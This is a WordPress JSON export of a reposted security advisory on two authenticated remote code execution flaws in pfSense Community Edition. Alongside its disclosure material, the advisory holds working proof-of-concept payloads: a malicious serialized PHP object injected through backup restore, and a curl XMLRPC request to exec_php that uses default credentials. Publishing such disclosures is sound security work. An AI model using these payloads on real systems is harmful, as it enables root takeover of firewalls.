{"id":41065,"date":"2026-02-16T12:46:51","date_gmt":"2026-02-16T12:46:51","guid":{"rendered":"http:\/\/localhost\/?p=41065"},"modified":"2026-02-16T12:46:51","modified_gmt":"2026-02-16T12:46:51","slug":"netgate-pfsense-community-edition-272-280-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41065","title":{"rendered":"\ud83d\udcc4 Netgate pfSense Community Edition 2.7.2 \/ 2.8.0 Remote Code Execution_PACKETSTORM:215645"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-16T17:44:36&#8243;,&#8221;description&#8221;:&#8221;Netgate pfSense Community Edition versions 2.7.2 and 2.8.0 appear to suffer from multiple authenticated remote code execution vulnerabilities that the vendor has written off as abusive administrator behavior but a non-issue&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-16T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-16T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Netgate pfSense Community Edition 2.7.2 \/ 2.8.0 Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215645&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-69690&#8243;,&#8221;CVE-2025-69691&#8243;],&#8221;sourceData&#8221;:&#8221;# \ud83d\udd10 CVE-2025-69690 \\u0026 CVE-2025-69691\\n    \\n    \\u003e **Authenticated Remote Code Execution in Netgate pfSense Community Edition**\\n    \\n    ![CVE](https:\/\/img.shields.io\/badge\/CVE-2025&#8211;69690-red?style=flat-square)\\n    ![CVE](https:\/\/img.shields.io\/badge\/CVE-2025&#8211;69691-critical?style=flat-square\\u0026color=darkred)\\n    ![CVSS](https:\/\/img.shields.io\/badge\/CVSS-8.8%20%7C%209.9-orange?style=flat-square)\\n    ![Vendor](https:\/\/img.shields.io\/badge\/Vendor-Netgate-blue?style=flat-square)\\n    ![Status](https:\/\/img.shields.io\/badge\/Patch-None-red?style=flat-square)\\n    \\n    &#8212;\\n    \\n    ## \ud83d\udccb Summary\\n    \\n    | Field | Details |\\n    |&#8212;&#8212;-|&#8212;&#8212;&#8212;|\\n    | **Researcher** | Nelson Adhepeau ([@privlabs](https:\/\/github.com\/privlabs)) |\\n    | **Vendor** | Netgate |\\n    | **Product** | pfSense Community Edition |\\n    | **Versions** | 2.7.2 and 2.8.0 |\\n    | **Type** | Authenticated Remote Code Execution |\\n    | **Disclosure** | February 2026 |\\n    | **Vendor notified** | December 2, 2025 |\\n    | **CVE assigned** | January 28, 2026 |\\n    \\n    &#8212;\\n    \\n    ## \u26a0\ufe0f Disclaimer\\n    \\n    \\u003e This research was conducted in **isolated lab environments** for educational\\n    \\u003e and security awareness purposes only. All findings were responsibly disclosed\\n    \\u003e to the vendor prior to publication. This advisory does **not** constitute an\\n    \\u003e invitation to attack production systems. Unauthorized testing is illegal.\\n    \\n    &#8212;\\n    \\n    ## \ud83c\udfaf CVE-2025-69690\\n    ### Unsafe Deserialization \u2192 RCE (pfSense CE 2.7.2)\\n    \\n    | Field | Value |\\n    |&#8212;&#8212;-|&#8212;&#8212;-|\\n    | **CVSS v3.1** | **8.8 (High)** |\\n    | **Vector** | `AV:N\/AC:L\/PR:H\/UI:N\/S:C\/C:H\/I:H\/A:H` |\\n    | **CWE** | CWE-502, CWE-915 |\\n    | **Attack Type** | Authenticated (Admin) |\\n    | **Component** | Backup\/Restore mechanism |\\n    \\n    ### Description\\n    \\n    The pfSense configuration restore mechanism invokes `unserialize()` on\\n    user-controlled data **without class whitelisting, input validation, or\\n    sandboxing**.\\n    \\n    A crafted backup file containing a malicious serialized PHP object injects\\n    arbitrary commands via the `post_reboot_commands` property, which are\\n    executed through `mwexec()` with **full root privileges**.\\n    \\n    ### Attack Flow\\n    \\n    &#8220;`\\n    [Attacker] \u2192 Login as admin\\n               \u2192 Upload malicious .xml backup file\\n               \u2192 Trigger restore\\n               \u2192 pfSense calls unserialize() on attacker data\\n               \u2192 post_reboot_commands executed via mwexec()\\n               \u2192 [ROOT SHELL]\\n    &#8220;`\\n    \\n    ### Affected Components\\n    \\n    &#8211; `config.php` \u2014 restore processing logic\\n    &#8211; `pfsense_module_installer` class \u2014 unsafe deserialization target\\n    &#8211; `mwexec()` \u2014 command execution sink\\n    \\n    ### PoC Payload\\n    \\n    &#8220;`php\\n    O:23:\\&#8221;pfsense_module_installer\\&#8221;:1:{\\n      s:17:\\&#8221;*post_reboot_commands\\&#8221;;\\n      a:1:{\\n        i:0;s:40:\\&#8221;\/usr\/local\/bin\/php -r &#8216;system(\\\\\\&#8221;id\\\\\\&#8221;);&#8217;\\&#8221;;\\n      }\\n    }\\n    &#8220;`\\n    \\n    ### Impact\\n    \\n    &#8211; \u2705 Arbitrary OS command execution as root\\n    &#8211; \u2705 Persistent backdoor installation\\n    &#8211; \u2705 Complete firewall takeover\\n    &#8211; \u2705 Credential and configuration exfiltration\\n    \\n    ### Vendor Response\\n    \\n    \\u003e *\\&#8221;Acknowledged. Classified as authenticated administrative abuse.\\n    \\u003e No patch will be issued.\\&#8221;* \u2014 Netgate\\n    \\n    &#8212;\\n    \\n    ## \ud83c\udfaf CVE-2025-69691\\n    ### XMLRPC exec_php \u2192 RCE (pfSense CE 2.8.0)\\n    \\n    | Field | Value |\\n    |&#8212;&#8212;-|&#8212;&#8212;-|\\n    | **CVSS v3.1** | **9.9 (Critical)** |\\n    | **Vector** | `AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H` |\\n    | **CWE** | CWE-284, CWE-915 |\\n    | **Attack Type** | Authenticated (remote, Basic Auth) |\\n    | **Component** | XMLRPC API \u2014 `pfsense.exec_php` |\\n    \\n    ### Description\\n    \\n    pfSense CE 2.8.0 exposes an XMLRPC method `pfsense.exec_php` that\\n    **executes arbitrary PHP code as root** without validation, sandboxing,\\n    or any form of restriction.\\n    \\n    The endpoint is:\\n    &#8211; \u2705 Enabled **by default**\\n    &#8211; \u2705 Accessible remotely over **HTTPS**\\n    &#8211; \u2705 Protected only by **Basic Authentication**\\n    &#8211; \u2705 Exploitable with **default credentials** (`admin:pfsense`)\\n    \\n    ### Attack Flow\\n    \\n    &#8220;`\\n    [Attacker] \u2192 Send XMLRPC request to \/xmlrpc.php\\n               \u2192 Authenticate with admin:pfsense (default)\\n               \u2192 Call pfsense.exec_php with arbitrary PHP\\n               \u2192 Code executes as root, no sandboxing\\n               \u2192 [ROOT SHELL]\\n    &#8220;`\\n    \\n    ### Affected Components\\n    \\n    &#8211; `xmlrpc.php` \u2014 API entry point\\n    &#8211; `pfsense.exec_php` \u2014 unsafe dynamic code execution\\n    &#8211; BasicAuth layer \u2014 insufficient access control\\n    \\n    ### PoC\\n    \\n    &#8220;`bash\\n    curl -k -u admin:pfsense \\\\\\n      -H \\&#8221;Content-Type: text\/xml\\&#8221; \\\\\\n      -d &#8216;\\u003cmethodCall\\u003e\\n            \\u003cmethodName\\u003epfsense.exec_php\\u003c\/methodName\\u003e\\n            \\u003cparams\\u003e\\n              \\u003cparam\\u003e\\n                \\u003cvalue\\u003e\\u003cstring\\u003esystem(\\&#8221;id\\&#8221;);\\u003c\/string\\u003e\\u003c\/value\\u003e\\n              \\u003c\/param\\u003e\\n            \\u003c\/params\\u003e\\n          \\u003c\/methodCall\\u003e&#8217; \\\\\\n      https:\/\/\\u003ctarget\\u003e\/xmlrpc.php\\n    &#8220;`\\n    \\n    ### Impact\\n    \\n    &#8211; \u2705 Full remote root compromise\\n    &#8211; \u2705 Arbitrary file read\/write\\n    &#8211; \u2705 Backdoor deployment\\n    &#8211; \u2705 Firewall rule manipulation\\n    &#8211; \u2705 Extraction of all credentials and configurations\\n    \\n    ### Vendor Response\\n    \\n    \\u003e *\\&#8221;Acknowledged. Classified as expected behavior for authenticated\\n    \\u003e users. No patch planned.\\&#8221;* \u2014 Netgate\\n    \\n    &#8212;\\n    \\n    ## \ud83d\udcc5 Timeline\\n    \\n    &#8220;`\\n    November 2025     \u2192  Vulnerabilities discovered\\n    December 2, 2025  \u2192  Responsible disclosure to Netgate\\n                      \u2192  Vendor acknowledged, no patch planned\\n    January 28, 2026  \u2192  CVE IDs assigned by MITRE\\n    February 2026     \u2192  Public disclosure\\n    &#8220;`\\n    \\n    &#8212;\\n    \\n    ## \ud83d\udd17 References\\n    \\n    &#8211; \ud83d\udd34 [CVE-2025-69690 on cve.org](https:\/\/cve.org\/CVERecord?id=CVE-2025-69690)\\n    &#8211; \ud83d\udd34 [CVE-2025-69691 on cve.org](https:\/\/cve.org\/CVERecord?id=CVE-2025-69691)\\n    &#8211; \ud83d\udce7 Full disclosure: `fulldisclosure@seclists.org`\\n    \\n    &#8212;\\n    \\n    ## \ud83d\udc64 Researcher\\n    \\n    **Nelson Adhepeau** \u2014 Independent Security Researcher\\n    \\n    [![LinkedIn](https:\/\/img.shields.io\/badge\/LinkedIn-nelson&#8211;adhepeau-blue?style=flat-square\\u0026logo=linkedin)](https:\/\/linkedin.com\/in\/nelson-adhepeau)\\n    [![GitHub](https:\/\/img.shields.io\/badge\/GitHub-privlabs-black?style=flat-square\\u0026logo=github)](https:\/\/github.com\/privlabs)\\n    \\n    \ud83d\udce7 privexploits@protonmail.com&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215645&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215645\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-16T17:44:36&#8243;,&#8221;description&#8221;:&#8221;Netgate pfSense Community Edition versions 2.7.2 and 2.8.0 appear to suffer from multiple authenticated remote code execution vulnerabilities that the vendor has written off as&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-41065","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Netgate pfSense Community Edition 2.7.2 \/ 2.8.0 Remote Code Execution_PACKETSTORM:215645 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41065\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Netgate pfSense Community Edition 2.7.2 \/ 2.8.0 Remote Code Execution_PACKETSTORM:215645 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-16T17:44:36&#8243;,&#8221;description&#8221;:&#8221;Netgate pfSense Community Edition versions 2.7.2 and 2.8.0 appear to suffer from multiple authenticated remote code execution vulnerabilities that the vendor has written off as...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41065\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-16T12:46:51+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41065#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41065\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Netgate pfSense Community Edition 2.7.2 \\\/ 2.8.0 Remote Code Execution_PACKETSTORM:215645\",\"datePublished\":\"2026-02-16T12:46:51+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41065\"},\"wordCount\":1058,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41065#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41065\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41065\",\"name\":\"\ud83d\udcc4 Netgate pfSense Community Edition 2.7.2 \\\/ 2.8.0 Remote Code Execution_PACKETSTORM:215645 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-16T12:46:51+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41065#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41065\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41065#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Netgate pfSense Community Edition 2.7.2 \\\/ 2.8.0 Remote Code Execution_PACKETSTORM:215645\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Netgate pfSense Community Edition 2.7.2 \/ 2.8.0 Remote Code Execution_PACKETSTORM:215645 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41065","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Netgate pfSense Community Edition 2.7.2 \/ 2.8.0 Remote Code Execution_PACKETSTORM:215645 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-16T17:44:36&#8243;,&#8221;description&#8221;:&#8221;Netgate pfSense Community Edition versions 2.7.2 and 2.8.0 appear to suffer from multiple authenticated remote code execution vulnerabilities that the vendor has written off as...","og_url":"https:\/\/zero.redgem.net\/?p=41065","og_site_name":"zero redgem","article_published_time":"2026-02-16T12:46:51+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41065#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41065"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Netgate pfSense Community Edition 2.7.2 \/ 2.8.0 Remote Code Execution_PACKETSTORM:215645","datePublished":"2026-02-16T12:46:51+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41065"},"wordCount":1058,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41065#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41065","url":"https:\/\/zero.redgem.net\/?p=41065","name":"\ud83d\udcc4 Netgate pfSense Community Edition 2.7.2 \/ 2.8.0 Remote Code Execution_PACKETSTORM:215645 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-16T12:46:51+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41065#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41065"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41065#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Netgate pfSense Community Edition 2.7.2 \/ 2.8.0 Remote Code Execution_PACKETSTORM:215645"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41065","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41065"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41065\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41065"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41065"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41065"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}